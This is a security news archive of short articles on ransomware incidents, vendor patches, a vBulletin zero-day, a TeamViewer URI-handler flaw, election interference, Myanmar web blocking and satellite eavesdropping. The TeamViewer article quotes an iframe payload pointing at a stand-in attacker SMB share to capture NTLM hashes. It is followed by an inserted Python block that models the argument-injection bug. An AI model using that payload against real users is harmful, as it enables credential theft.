Category Archives: Breaking News

City of Lafayette (Colorado) paid $45,000 ransom after ransomware attack

The City of Lafayette, Colorado, USA, has been forced to pay $45,000 because they were unable to restore necessary files from backup.

On July 27th, the systems of the City of Lafayette, Colorado, were infected with ransomware; the malicious code impacted phone services, email, and online payment reservation systems.

The City did not immediately disclose the cause of the outage of its systems and invited the citizens to use 911 or an alternate number for emergency services.

Now the City of Lafayette has admitted it was the victim of a ransomware attack that encrypted its systems and confirmed that it opted to pay a $45,000 ransom to receive a decryption tool to recover its files.

“After a thorough examination of the situation and cost scenarios, and considering the potential for lengthy inconvenient service outages for residents, we determined that obtaining the decryption tool far outweighed the cost and time to rebuild data and systems,” City of Lafayette Mayor Jamie Harkins explained in a video.

The City did not disclose technical details of the attack or the family of ransomware that infected its systems; it only stated that it does not believe any data was stolen. The City also added that credit card data was not stored on its systems, but it nonetheless invited residents and employees to monitor their bank accounts for suspicious activity.

“Financial data appears to be recoverable from unaffected backups. Personal credit card information was not compromised, as the City uses external PCI-certified payment gateways.” reads the announcement published by the City. “There is no evidence to suggest personal data was compromised, but out of an abundance of caution, residents and employees are advised to be vigilant to monitor accounts for suspicious activity.”

The City is going to notify individuals who have personal information stored on the City’s network.

The small amount of money requested suggests that the attackers are not one of the major ransomware gangs, like Maze, REvil, or Clop, which usually ask for a much higher ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, City of Lafayette)

The post City of Lafayette (Colorado) paid $45,000 ransom after ransomware attack appeared first on Security Affairs.

Citrix fixed flaws in XenMobile that will likely be exploited soon

Citrix addressed multiple vulnerabilities in Citrix Endpoint Management (XenMobile) that can be exploited by an attacker to gain administrative privileges on affected systems.

The Citrix Endpoint Management (CEM), formerly XenMobile, is software that provides mobile device management (MDM) and mobile application management (MAM).

The vulnerabilities that impacted Citrix XenMobile are tracked as CVE-2020-8208, CVE-2020-8209, CVE-2020-8210, CVE-2020-8211, and CVE-2020-8212. Citrix confirmed that these flaws could be chained to allow a remote unauthenticated attacker to gain administrative control of a Citrix Endpoint Management (CEM) server.

The impact of the issues depends on the specific version of the software. The vulnerabilities impacting XenMobile server 10.12 before RP2, 10.11 before RP4, 10.10 before RP6, and all versions before 10.9 RP5 have been rated as critical. For XenMobile Server versions 10.12 before RP3, 10.11 before RP6, 10.10 before RP6, and releases prior to 10.9 RP5, the issues have been rated medium or low.

“Today we posted a Security Bulletin covering a set of vulnerabilities in certain on-premises instances of Citrix Endpoint Management (CEM), often referred to as XenMobile Server.” reads the advisory published by Citrix.

“The latest rolling patches that need to be applied for versions 10.9, 10.10, 10.11, and 10.12 are available immediately. Any versions prior to 10.9.x must be upgraded to a supported version with the latest rolling patch.”

The company pre-notified its customers and national CERTs around the world on July 23, but it did not provide technical details on the addressed vulnerabilities. Citrix is urging users to upgrade their systems.

“We recommend these upgrades be made immediately. While there are no known exploits as of this writing, we do anticipate malicious actors will move quickly to exploit,” continues the advisory.

The flaws were reported by Andrey Medov of Positive Technologies, Glyn Wintle of Tradecraft, and Kristian Bremberg of Detectify.

Experts pointed out that the flaws are not trivial to exploit: in order to exploit the issues, an attacker needs access to the target network.


Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days

Microsoft August 2020 Patch Tuesday updates addressed 120 vulnerabilities, including two zero-days that have been exploited in attacks.

Microsoft August 2020 Patch Tuesday updates have addressed 120 flaws, including two zero-day vulnerabilities that have been exploited in attacks in the wild.

The two issues are a Windows spoofing bug and a remote code execution flaw in Internet Explorer.

The Windows spoofing flaw, tracked as CVE-2020-1464, can be exploited by an attacker to bypass security features and load improperly signed files. The flaw is caused by Windows incorrectly validating file signatures.

“A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files.” reads the advisory published by Microsoft.

“In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded.”

The flaw affects many Windows versions, including Windows 7 and Windows Server 2008, for which the IT giant will not provide security updates because they have reached end of life.

Microsoft confirmed that threat actors are actively exploiting the issue in attacks against Windows systems, but it did not provide technical details about the attacks.

The second zero-day addressed by Microsoft is tracked as CVE-2020-1380; it is a remote code execution issue that affects the scripting engine used by Internet Explorer. The flaw is related to the way the engine handles objects in memory and could be exploited by tricking victims into visiting a malicious website, by having them open a malicious Office document, or through a malvertising attack.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system.”

The RCE vulnerability was discovered by security researchers at Kaspersky.

Microsoft also addressed 15 other critical vulnerabilities that impact Windows, the Edge and Internet Explorer browsers, Outlook, and the .NET framework. Most of these vulnerabilities are remote code execution issues.

Microsoft August 2020 Patch Tuesday also fixed over 100 vulnerabilities, rated as important, impacting Windows, Dynamics 365, Office, Outlook, SharePoint, and Visual Studio Code. These flaws can be exploited for remote code execution, privilege escalation, XSS attacks, DoS attacks, and to disclose information.

The full list of flaws addressed by Microsoft August 2020 Patch Tuesday is available here.


Adobe Acrobat and Reader affected by critical flaws

Adobe has released security updates to address twenty-six vulnerabilities in the Adobe Acrobat, Reader, and Lightroom products.

Adobe has released security updates to address 26 vulnerabilities in the Adobe Acrobat, Reader, and Lightroom products.

Eleven out of twenty-six flaws are rated as ‘Critical’ because they could be exploited by attackers to remotely execute arbitrary code or bypass security features on vulnerable computers.

APSB20-48 Security updates available for Adobe Acrobat and Reader

Adobe has released security updates that address 25 vulnerabilities in the Adobe Acrobat and Reader products; 11 of them are rated as ‘Critical.’

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by the company.

Below is the list of the addressed issues.

Vulnerability Category       | Vulnerability Impact          | Severity  | CVE Number
Disclosure of Sensitive Data | Memory Leak                   | Important | CVE-2020-9697
Security bypass              | Privilege Escalation          | Important | CVE-2020-9714
Out-of-bounds write          | Arbitrary Code Execution      | Critical  | CVE-2020-9693, CVE-2020-9694
Security bypass              | Security feature bypass       | Critical  | CVE-2020-9696, CVE-2020-9712
Stack exhaustion             | Application denial-of-service | Important | CVE-2020-9702, CVE-2020-9703
Out-of-bounds read           | Information disclosure        | Important | CVE-2020-9723, CVE-2020-9705, CVE-2020-9706, CVE-2020-9707, CVE-2020-9710, CVE-2020-9716, CVE-2020-9717, CVE-2020-9718, CVE-2020-9719, CVE-2020-9720, CVE-2020-9721
Buffer error                 | Arbitrary Code Execution      | Critical  | CVE-2020-9698, CVE-2020-9699, CVE-2020-9700, CVE-2020-9701, CVE-2020-9704
Use-after-free               | Arbitrary Code Execution      | Critical  | CVE-2020-9715, CVE-2020-9722

APSB20-51 Security update available for Adobe Lightroom

Adobe has released a security update to address a DLL hijacking vulnerability in Adobe Lightroom that could be exploited by an attacker to execute commands with elevated privileges.

“Adobe has released updates for Adobe Lightroom Classic for Windows and macOS. This update addresses an important vulnerability. Successful exploitation could lead to privilege escalation in the context of the current user.” reads the advisory.

An attacker can exploit the flaw to have a malicious DLL loaded when the software is launched.

Vulnerability Category   | Vulnerability Impact | Severity  | CVE Numbers
Insecure Library Loading | Privilege escalation | Important | CVE-2020-9724

Adobe has released Lightroom Classic 9.3 to address the vulnerability.

Users of these products are recommended to upgrade to the latest versions as soon as possible.


Flaws in ‘Find My Mobile’ exposed Samsung phones to hack

A researcher found multiple flaws in Samsung’s Find My Mobile that could have been chained to perform various malicious activities on Samsung Galaxy Phones.

The security researcher Pedro Umbelino from Portugal-based cybersecurity services provider Char49 discovered multiple vulnerabilities in Samsung’s Find My Mobile that could have been chained to perform various malicious activities on Samsung Galaxy Phones.

“There are several vulnerabilities in the Find My Mobile package that can ultimately result in complete data loss for the smartphone user (factory resetting), as well as real time location tracking, phone call and message retrieving, phone lockout, phone unlock, etc. Every action that is possible for the user to perform using the web application that is passed to the device can be abused by a malicious application.” reads the report published by the security firm. “The code path to execute these actions involves several vulnerabilities being chained.”

The expert shared his findings at the DEF CON conference last week.

The “Find My Mobile” feature allows owners of Samsung devices to find their lost phones; it also allows them to remotely lock a device, block access to Samsung Pay, and completely wipe the content of the device.

The Char49 researcher found four vulnerabilities in Find My Mobile components that could have been exploited by a rogue app installed on the device that only requires access to the device’s SD card.

Access to the device’s SD card allows the app to trigger the first vulnerability in the attack chain and then create a file that the attacker uses to intercept communications with the backend servers.

The expert presented the research last week at the DEF CON 28 Safe Mode virtual hacking conference.

Successful exploitation of the flaws would have allowed a malicious app to perform the same actions allowed to the Find My Mobile app, including forcing a factory reset, wiping data, locating the device, accessing phone calls and messages, and locking and unlocking the phone.

Char49 discovered the flaws more than a year ago, and Samsung addressed them in October 2019.

The expert explained that the exploit chain works on unpatched Samsung Galaxy S7, S8, and S9+ devices.

“This flaw, after setup, can be easily exploited and with severe implications for the user and with a potentially catastrophic impact: permanent denial of service via phone lock, complete data loss with factory reset (sdcard included), serious privacy implication via IMEI and location tracking as well as call and SMS log access,” concludes the report.

“The [Find My Mobile] application should not have arbitrary components publicly available and in an exported state. If absolutely necessary, for example if other packages call these components, then they should be protected with proper permissions. Testing code that relies on the existence of files in public places should be eliminated.”


Avaddon ransomware operators have launched their data leak site

Avaddon ransomware operators, like other cybercrime groups, decided to launch a data leak site where they publish the data of victims who refuse to pay a ransom demand.

Avaddon ransomware operators announced the launch of their data leak site where they will publish the data stolen from the victims who do not pay a ransom demand.

The first group to adopt this strategy was the Maze ransomware gang in December 2019; since then other crews have adopted the same strategy, including REvil, Nefilim, and Netwalker.

The threat of exposing the victim’s sensitive data is used by the gang to force them into paying a ransom.

Cybersecurity intelligence firm Kela was the first to report that the Avaddon ransomware operators have announced on a Russian-speaking hacker forum their new data leak site.


The hackers have already published on the leak site 3.5MB of documents stolen from a construction company.

Let’s wait for new entries on the leak site!


Researcher discloses exploit code for a vBulletin zero-day

A researcher published details and proof-of-concept exploit code for a zero-day RCE vulnerability in the popular forum CMS vBulletin.

The researcher Amir Etemadieh has published technical details and proof-of-concept exploit code for a zero-day remote code execution vulnerability in vBulletin, the popular forum software.

The new vulnerability is a bypass of the security patch released by vBulletin for the CVE-2019-16759 flaw, disclosed in September 2019.

The previous vulnerability could be exploited remotely by an unauthenticated attacker. The PoC exploit published by the researcher works on vBulletin versions from 5.0.0 up to the latest 5.5.4.

The flaw resides in the way an internal widget file of the forum software package accepts configurations via URL parameters. The expert discovered that the package fails to validate these parameters, so an attacker could exploit it to inject commands and remotely execute code on a vulnerable install.

The CVE-2019-16759 flaw was publicly disclosed on September 24, 2019, and the maintainer of the vBulletin CMS released the security patch on September 25.

Now the researcher Amir Etemadieh has explained that the patch initially released did not completely fix the issue.

“Today, we’re going to talk about how the patch that was supplied for the vulnerability was inadequate in blocking exploitation, show how to bypass the resulting fix, and releasing a bash one-liner resulting in remote code execution in the latest vBulletin software.” reads a blog post published by Etemadieh.

The expert found a trivial way to bypass the patch and released three proof-of-concept exploits, in Bash, Python, and Ruby.

Etemadieh did not report the issue to the vBulletin team before the public disclosure of the flaw.

The exploit code is rapidly circulating on social media and inside hacking forums, for this reason, experts fear that threat actors will start using it in massive attacks.

The vBulletin team has already released a security patch to address this new zero-day vulnerability; forum owners who cannot patch immediately can also apply the following short-term fix:

  1. Go to the vBulletin administrator control panel.
  2. Click “Settings” in the menu on the left, then “Options” in the dropdown.
  3. Choose “General Settings” and then click “Edit Settings”
  4. Look for “Disable PHP, Static HTML, and Ad Module rendering”, Set to “Yes”
  5. Click “Save”

At the time of publishing, at least one vBulletin-based forum has been hacked using this new zero-day: the site of the popular DEF CON security conference.


TeamViewer flaw can allow hackers to steal System password

A severe vulnerability impacting TeamViewer for Windows, tracked as CVE-2020-13699, could be exploited by remote attackers to steal the system password.

TeamViewer has recently addressed a high-risk vulnerability (CVE-2020-13699) that could be exploited by remote attackers to steal the system password and potentially compromise the system.

TeamViewer is a popular software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.

The vulnerability, classified as an “Unquoted URI handler”, could be triggered by tricking the victims into visiting a malicious web site.

The vulnerability was discovered by the researcher Jeffrey Hofmann from Praetorian; it resides in the way TeamViewer quotes the parameters of its custom URI handlers. The expert discovered that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system.

The issue in TeamViewer’s URI scheme allows a web page crafted by the attacker to trick the application installed on the victim’s system into initiating a connection to an attacker-owned remote SMB share.

This means that the SMB authentication process will leak the system’s username and the NTLMv2 hash of the password to the attacker.

The attacker could embed a malicious iframe on a website and then trick victims into visiting that malicious URL. Upon visiting the page, TeamViewer will automatically launch its Windows desktop client and open the remote SMB share.

“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.

“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

The TeamViewer project has fixed the issue by quoting the parameters passed by the affected URI handlers.
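As an added illustration (not TeamViewer’s own code) of the “unquoted URI handler” bug class described above, the following Python models how a Windows URI-handler command template expands a crafted URI into an argument vector with and without quoting of the %1 placeholder; the handler path, the --play switch as a constructed example, and the UNC host are assumptions, not values taken from TeamViewer’s registration.

```python
"""Model of the 'unquoted URI handler' bug class behind CVE-2020-13699.

Added example, not TeamViewer's code. A custom URI scheme handler is registered
as a command template in which %1 is replaced by the full URI. If %1 is unquoted,
Windows splits the URI body on whitespace and the web page controls extra switches;
the fix the post describes (quoting the parameters) keeps the whole URI as a single
argument. The templates, switch name and UNC host below are constructed.
"""
from typing import List


def windows_argv(cmdline: str) -> List[str]:
    """Split a command line the way Windows' CommandLineToArgvW does (simplified).

    Rules: whitespace separates arguments outside double quotes; 2n backslashes
    before a quote become n backslashes plus a quote toggle; 2n+1 backslashes
    before a quote become n backslashes plus a literal quote; all other
    backslashes are literal, so UNC paths like \\host\share survive untouched.
    """
    args: List[str] = []
    cur: List[str] = []
    in_quotes = False
    have_arg = False
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\":
            n = 0
            while i < len(cmdline) and cmdline[i] == "\\":
                n += 1
                i += 1
            if i < len(cmdline) and cmdline[i] == '"':
                cur.append("\\" * (n // 2))
                if n % 2 == 1:              # odd run: the quote is a literal character
                    cur.append('"')
                    i += 1
            else:
                cur.append("\\" * n)        # backslashes not before a quote are literal
            have_arg = True
        elif ch == '"':
            in_quotes = not in_quotes       # quote toggles whitespace handling
            have_arg = True
            i += 1
        elif ch in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(ch)
            have_arg = True
            i += 1
    if have_arg:
        args.append("".join(cur))
    return args


def expand_handler(template: str, uri: str) -> List[str]:
    """argv the application receives when the handler template is invoked for `uri`."""
    return windows_argv(template.replace("%1", uri))


def injected_switches(argv: List[str]) -> List[str]:
    """Audit helper: switch-like arguments that came from the URI, not from the handler."""
    return [a for a in argv[1:] if a.startswith("-")]


# Constructed templates: the real registration path is not given on the page.
VULNERABLE_TEMPLATE = r'"C:\Program Files\Example\app.exe" %1'     # unquoted %1
HARDENED_TEMPLATE = r'"C:\Program Files\Example\app.exe" "%1"'     # quoted %1
# Shape of the URI from the post, with a constructed host and file name.
CRAFTED_URI = r"teamviewer10: --play \\example-host\share\x.tvs"
```

With the unquoted template the URI body becomes three separate arguments, so `--play` reaches the application as a switch; with the quoted template the whole URI is one argument and `injected_switches()` finds nothing.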

The vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. TeamViewer released version 15.8.3 to address the issue, and users are recommended to update to it.

Such issues are very dangerous because of the popularity of the software, which is used by millions of users.

At the time it addressed the issue, the TeamViewer team was not aware of attacks in the wild exploiting it.


Nefilim ransomware operators claim to have hacked the SPIE group

Nefilim ransomware operators allegedly targeted the SPIE group, an independent European leader in multi-technical services.

Researchers from threat intelligence firm Cyble reported that Nefilim ransomware operators allegedly hacked The SPIE Group, an independent European leader in multi-technical services.

The number of ransomware attacks continues to increase; attackers also steal victims’ data and threaten to release the stolen information if the ransom is not paid.

During darkweb and deepweb monitoring, the Cyble Research Team discovered a post from Nefilim ransomware operators in which they claimed to have breached The SPIE Group.


The ransomware gang also revealed that it had stolen the company’s sensitive data.

The SPIE Group provides multi-technical services in the areas of energy and communications, it has more than 47,200 employees and in 2019 it reported consolidated revenues of €6.9 billion and consolidated EBITA of €416 million.

Nefilim ransomware operators have also released a first batch of files and threaten to release further documents. Cyble experts analyzed the material; the first lot contains around 11.5 GB of data.

“The data leak seems to consist of corporate operational documents which include the company’s telecom services contracts, dissolution legal documents, power of attorney documents, infrastructure group reconstructions contracts, and much more.” reported Cyble.

The Nefilim ransomware operators released a total of 65,042 files contained in 18,551 data folders.

Nefilim ransomware operators continue to be very active in this period; recently the group targeted the Dussmann Group, Germany’s largest private multi-service provider, and Orange S.A., one of the largest mobile network operators based in France.

Below is a list of tips provided by Cyble to prevent ransomware attacks:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.


NCSC Director warns of interference on elections tied to Russia, China, Iran

The Director of the U.S. National Counterintelligence and Security Center (NCSC) shared information on attempts to influence the 2020 U.S. elections.

The Director of the U.S. National Counterintelligence and Security Center (NCSC) William Evanina shared information on ongoing operations aimed at influencing the 2020 U.S. elections.

“Many foreign actors have a preference for who wins the election, which they express through a range of overt and private statements; covert influence efforts are rarer. We are primarily concerned about the ongoing and potential activity by China, Russia, and Iran” reads the press release published by the Office of the Director of the National Intelligence.

Evanina linked the efforts to Russia, China, and Iran. He explained, for example, that Russian actors are supporting President Trump’s candidacy with a coordinated effort on both Russian television and social media.

According to US intelligence, Russia is carrying out campaigns to denigrate former Vice President Biden, whom the Kremlin considers hostile.

“We assess that Russia is using a range of measures to primarily denigrate former Vice President Biden and what it sees as an anti-Russia “establishment.” This is consistent with Moscow’s public criticism of him when he was Vice President for his role in the Obama Administration’s policies on Ukraine and its support for the anti-Putin opposition inside Russia.” said NCSC’s Director. “For example, pro-Russia Ukrainian parliamentarian Andriy Derkach is spreading claims about corruption – including through publicizing leaked phone calls – to undermine former Vice President Biden’s candidacy and the Democratic Party. Some Kremlin-linked actors are also seeking to boost President Trump’s candidacy on social media and Russian television.”

Iran is mainly operating to undermine U.S. democratic institutions and to divide the country ahead of the forthcoming 2020 elections. Iran-linked actors are spreading disinformation on social media and pushing anti-U.S. content.

“We assess that Iran seeks to undermine U.S. democratic institutions, President Trump, and to divide the country in advance of the 2020 elections. Iran’s efforts along these lines probably will focus on on-line influence, such as spreading disinformation on social media and recirculating anti-U.S. content.” continues the statement. “Tehran’s motivation to conduct such activities is, in part, driven by a perception that President Trump’s reelection would result in a continuation of U.S. pressure on Iran in an effort to foment regime change.”

China would prefer that President Trump lose the presidential election, since Beijing considers him unpredictable.

“We assess that China prefers that President Trump – whom Beijing sees as unpredictable – does not win reelection. China has been expanding its influence efforts ahead of November 2020 to shape the policy environment in the United States, pressure political figures it views as opposed to China’s interests, and deflect and counter criticism of China. Although China will continue to weigh the risks and benefits of aggressive action, its public rhetoric over the past few months has grown increasingly critical of the current Administration’s COVID-19 response, closure of China’s Houston Consulate, and actions on other issues.” continues the statement. “For example, it has harshly criticized the Administration’s statements and actions on Hong Kong, TikTok, the legal status of the South China Sea, and China’s efforts to dominate the 5G market. Beijing recognizes that all of these efforts might affect the presidential race.”

Evanina warns that foreign states will continue to use covert and overt influence operations to influence the presidential election. The Director also warns of attempts to compromise election infrastructure for multiple purposes, including interfering with the voting process, stealing sensitive data, or calling into question the validity of the election results.

In July, Evanina published another analysis of foreign threats to the U.S. 2020 presidential election warning of coordinated efforts of foreign nation-sponsored actors to interfere with elections through traditional and social media.

“At the most basic level, we encourage Americans to consume information with a critical eye, check out sources before reposting or spreading messages, practice good cyber hygiene and media literacy, and report suspicious election-related activity to authorities,” he said.


INTERNET BLOCKING IN MYANMAR – SECRET BLOCK LIST AND NO MEANS TO APPEAL

The list of sites blocked in MYANMAR includes many websites that did not fall under the categories adult content or fake news

Original post at: https://www.qurium.org/alerts/myanmar/internet-blocking-in-myanmar-secret-block-list-and-no-means-to-appeal

In March 2020, the Ministry of Transport and Communications (MoTC) issued a directive to all operators in Myanmar with a secret list of 230 sites to be blocked due to the nature of their content: adult content and fake news. The order was based on article 77 of the Telecommunications Law, and the MoTC directive stipulated that the list of blocked sites was confidential and could not be made public. If an operator publicized the list, it would be in violation of the directive and local law. However, the block list included many websites that did not fall under the categories “adult content or fake news”. Several legitimate and acknowledged media outlets related to minority ethnic groups and news focusing on Rakhine state were found on the list.

Telenor Myanmar – an attempt at resistance

There are four operators in Myanmar: state-owned Myanma Posts and Telecommunications (MPT), Qatar based Ooredoo, military-aligned Mytel, and privately owned Telenor Myanmar. Telenor initially challenged the blocking, and on March 23, Telenor Myanmar’s spokesperson said:

“Telenor Myanmar has not complied with the request to block sites in the category of ‘fake news’ as it has not been able to establish sufficient legal basis for this part of the request. Telenor Myanmar believes in open communication and regrets if any inconvenience is caused to the customers”

However, “dialogue with the authorities made it clear that non-compliance with the directive would have implications on the company’s ability to service the public” says Cathrine Stang Lund, Acting VP Communications at the Telenor Group, Singapore. In April 2020, Telenor complied with the directive and blocked ALL sites on the block list. In a press release from April 22, Telenor stated:

“Telenor has assessed that the risk involved in not following the directive as regards fake news is likely to have wider implications in terms of servicing the public. Hence, the remaining sites have been blocked bringing the total count to 230.”

Five months later, several legitimate and trusted news sites such as Mandalay In-Depth News, KarenNews and Voice of Myanmar remain blocked in Myanmar.

How is the blocking implemented?

In collaboration with the civil society organization Myanmar ICT for Development Organization (MIDO), Qurium has investigated the blocking methods implemented by Telenor Myanmar and the state-owned operator Myanma Posts and Telecommunications (MPT).

During the joint research with MIDO, traffic was recorded from Telenor (AS133385) and MPT inside Myanmar (AS9988) to a number of blocked legitimate news sites that had been classified as “fake news”. Our findings show that both Telenor and MPT block websites using DNS tampering. MPT is ignoring the DNS requests to the blocked domains, while Telenor is redirecting them to an IP address outside of the country.

Telenor – redirects blocked users to anonymous foreign server

.pw domains are inexpensive and often used by spammers.

The blocking mechanism of Telenor is curious and requires a bit of attention. Telenor redirects all users attempting to access a blocked domain to an inexpensive VPS outside of Telenor’s own infrastructure under a non-Telenor domain. The VPS (IP address 167.172.4{.}60) is hosted in Digital Ocean, Singapore under the domain urlblocked.pw, a domain purchased in late March 2020 for less than 2 USD.

According to Stang-Lund at Telenor Myanmar, the reason for using an external domain hosted in Singapore as the landing page is to protect the users. She says “this (decision) is based on a holistic evaluation, including privacy considerations, as user data on attempted access is outside of Myanmar’s jurisdiction”.

However, by redirecting blocked users to a Digital Ocean VPS in Singapore (outside of Telenor’s infrastructure), Telenor puts readers at greater risk, as the traffic leaves Telenor’s control and travels via several unknown operators. Qurium has asked Telenor Myanmar to clarify why it did not place the block page within its own infrastructure (but outside of Myanmar’s jurisdiction), but has not received an answer.

(Screenshot) Telenor’s anonymous block page under the obscure domain urlblocked.pw.

The block page shows the user a brief message in Burmese and English. The message neither indicates that it comes from Telenor nor provides a means to appeal the blocking decision.

“Sorry, this URL is not available from Myanmar. You have tried to access a web page which has been blocked as per directive received from the Ministry of Transport and Communications Myanmar..”

Cathrine Stang-Lund explains “Since the authorities have not provided a complaint or appeal mechanism, nor contact details, Telenor Myanmar is unfortunately unable to provide that on the landing page. Any appeal should be made to the authorities.” Adding this information to the block page would increase the transparency and trustworthiness of Telenor Myanmar.

The block page uses the domain “urlblocked.pw”, registered on 26 March 2020 and served with a free Let’s Encrypt certificate.

 Domain Name: URLBLOCKED.PW
 Registry Domain ID: D180106494-CNIC
 Registrar WHOIS Server: whois.namesilo.com
 Registrar URL: https://www.namesilo.com
 Updated Date: 2020-03-31T03:01:23.0Z
 Creation Date: 2020-03-26T02:55:00.0Z
 Registry Expiry Date: 2021-03-26T23:59:59.0Z
 Registrar: NameSilo, LLC

To confirm the domain ownership, Qurium tried to reach the domain owner via the online form provided by nic.pw. A month later, no response had been received.

The mail account hostmaster@urlblocked.pw, published as the contact address in DNS, bounces all incoming mail.

Blocking without accountability

There are several aspects of the Internet blocking in Myanmar that raise questions. In this section we have collected the open questions that remain unanswered.

  1. Why does the MoTC not release a public list of all blocked sites? Why is the block list secret?
  2. Why does the MoTC not provide a complaint or appeal mechanism, or at least contact details for questions regarding the blocking?
  3. Why did Telenor decide to host the blocking page on a VPS at a third-party provider instead of using a server within the Telenor infrastructure?
  4. Why is this VPS hosted outside Myanmar, meaning that visitors to blocked sites are redirected to a server outside of Myanmar’s jurisdiction?
  5. Why did Telenor register the domain urlblocked.pw without proper contact information? Blocked websites have no means to identify and contact the organization responsible for the blocking and to exercise their right to object.
  6. Internet blocking is normally requested by the Ministry of Transport and Communications, but in order to force operators to implement the blocking, a legal decree is required. Did the operators receive such a decree from the Ministry of Justice of Myanmar?

Circumvention of Internet blocking

To circumvent Internet blocking of legitimate news sites, human rights organizations and LGBTQI initiatives, Qurium has developed the mirroring service Bifrost. Bifrost creates live-mirrors of WordPress sites, and pushes the content to large cloud storage services like Google or Amazon, which are too expensive for governments to block. In the case of Myanmar, Qurium has chosen to mirror In-Depth News Mandalay, a legitimate local news site focusing on the Mandalay region. The news site was blocked in March 2020 under the category “fake news”, after being openly critical against military violence and government corruption.

Further reading – OONI research report

For further reading on the current situation of Internet blocking in Myanmar, we recommend the article “Myanmar blocks websites amid COVID19” published by OONI in May 2020.

About the authors – Contacts:

Forensic report: Tord Lundström, Qurium Media Foundation < t@virtualroad.org >

Media: Clara Zid, Qurium Media Foundation < info@virtualroad.org >

Pierluigi Paganini

(SecurityAffairs – hacking, Myanmar)

The post INTERNET BLOCKING IN MYANMAR – SECRET BLOCK LIST AND NO MEANS TO APPEAL appeared first on Security Affairs.

Spying on satellite internet comms with a $300 listening station

An attacker could use $300 worth of off-the-shelf equipment to eavesdrop and intercept signals from satellite internet communications.

The academic researcher James Pavur, speaking at the Black Hat 2020 hacking conference, explained that satellite internet communications are susceptible to eavesdropping and signal interception. Attackers could use cheap equipment, basic home-television gear costing around $300, to spy on the internet traffic of high-value targets.

When a satellite ISP establishes an internet connection for a customer, it beams that customer’s signals up to a geostationary satellite using a narrow communications channel. The signal is then sent back down to a terrestrial receiving station and routed to the internet.

Response signals travel back along the same path, but the downlink from the satellite to the user is a broadcast transmission that carries a large volume of customers’ traffic simultaneously, in order to keep costs down.

“A critical difference is that we’re going to send [downstream signals] in a really wide beam, because we want to cover as many customers as possible, and satellites are very expensive,” explained Pavur. “So radio waves carrying a response to a Google search will reach our customer in the middle of the Atlantic Ocean; but they will also hit an attacker’s dish in, say, Ghana.”

Pavur explained that nation-state actors could use very expensive equipment installed in ground stations to eavesdrop on satellite communications. However, he demonstrated that it is possible to spy on satellite internet connections using basic consumer home-television equipment.

The boffin used a common flat-panel satellite dish and an off-the-shelf PCIe satellite tuner card to build the listening station. Pavur pointed out that professional PCIe tuner cards cost between $200 and $300, but it is possible to use less reliable and cheaper versions that go for $50 to $80.


The researchers explained that an attacker could spy on specific satellites, whose locations are public, by pointing the dish at them. Then they could use software like EPS Pro to discover internet feeds.

“We’re going to point our satellite dish at a spot in the sky that we know has a satellite, and we’re going to scan the Ku band of the radio spectrum to find signals against the background noise,” Pavur explained. “The way we’ll identify channels is by looking for distinct humps in the radio spectrum; because they stick out against the background noise, we can guess that there’s something going on there. We’ll tell our card tune to this one, and treat it as a digital video broadcasting for satellite feed. After a few seconds we get a lock on that feed, meaning we successfully found a connected satellite.”

Once a feed is discovered, the attacker has to record it and analyze the captured data to determine whether it carries Internet traffic or a TV feed. Pavur explained that this check is quite simple: he just looked for the string HTTP, which appears in Internet traffic but not in a TV feed.

Once the attacker has identified a satellite internet connection, he can record it and then parse it for valuable information. Feeds are transmitted in the MPEG video streaming format or with the Generic Stream Encapsulation (GSE) protocol.

MPEG is easy to parse using commonly available tools like Wireshark, while GSE leverages more complicated modulations that make it hard for cheap hardware to parse the stream.

Pavur and his colleagues noticed that most of the traffic they collected resulted in corrupted files; for this reason, they developed a tool called GC Extract to extract IP data out of a corrupted GSE recording.

“What this means is that an attacker who’s listening to your satellite signal gets to see what your internet service provider would expect to see: Every packet that comes to your modem, every BitTorrent you download, every website you visit,” Pavur said. “But it gets even worse if we look at enterprise customers, because a lot of them were operating what was essentially a corporate land network over the satellite feeds. For example, imagine a cruise line that has a bunch of Windows devices aboard it ships. This Windows local area network with all that internal LDAP traffic and SDP traffic will be broadcast over the satellite link, giving an eavesdropper perspective from behind the firewall.”

Pavur explained that attackers could also collect information even when the traffic is encrypted. The analysis of DNS could reveal the user’s Internet browsing history, while the analysis of TLS certificates could allow fingerprinting the servers the user connected to.

The researcher presented some real cases in which he was able to access data sent on satellite internet connections.

The researcher and his Oxford team disclosed their findings to the test victims and ISPs.

The Federal Bureau of Investigation released a private threat-intelligence notification following the presentation of the results of the research.

“However, recently conducted research discovered man-in-the-middle attacks against maritime VSAT signals can be conducted with less than $400 of widely available television equipment, presenting opportunities to a wider range of threat actors to potentially gain visibility into sensitive information.” reads the notification published by the FBI.

